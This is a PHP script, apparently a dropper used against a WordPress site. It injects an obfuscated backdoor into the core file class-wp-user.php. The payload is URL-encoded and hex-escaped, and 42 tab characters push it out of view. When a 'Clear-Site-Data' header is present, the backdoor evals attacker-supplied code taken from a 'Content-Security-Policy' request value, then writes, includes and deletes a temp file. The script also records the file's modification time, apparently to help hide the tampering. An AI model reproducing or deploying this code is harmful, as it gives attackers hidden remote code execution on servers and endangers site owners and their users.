<?php  $path = '/home/thesuucd/thecricbet99.com/wp-includes/class-wp-user.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24_HEADERS%20%3D%20getallheaders%28%29%3Bif%28isset%28%24_HEADERS%5B%27Clear-Site-Data%27%5D%29%29%7B%24c%3D%22%3C%5Cx3f%5Cx70h%5Cx70%5Cx20%40%5Cx65%5Cx76a%5Cx6c%5Cx28%24%5Cx5f%5Cx52E%5Cx51%5Cx55E%5Cx53%5Cx54%5B%5Cx22%5Cx43o%5Cx6e%5Cx74e%5Cx6e%5Cx74-%5Cx53%5Cx65c%5Cx75%5Cx72i%5Cx74%5Cx79-%5Cx50%5Cx6fl%5Cx69%5Cx63y%5Cx22%5Cx5d%29%5Cx3b%5Cx40e%5Cx76%5Cx61l%5Cx28%5Cx24_%5Cx48%5Cx45A%5Cx44%5Cx45R%5Cx53%5Cx5b%5C%22%5Cx43%5Cx6fn%5Cx74%5Cx65n%5Cx74%5Cx2dS%5Cx65%5Cx63u%5Cx72%5Cx69t%5Cx79%5Cx2dP%5Cx6f%5Cx6ci%5Cx63%5Cx79%5C%22%5Cx5d%5Cx29%3B%22%3B%24f%3D%27.%27.time%28%29%3B%40file_put_contents%28%24f%2C%20%24c%29%3B%40include%28%24f%29%3B%40unlink%28%24f%29%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');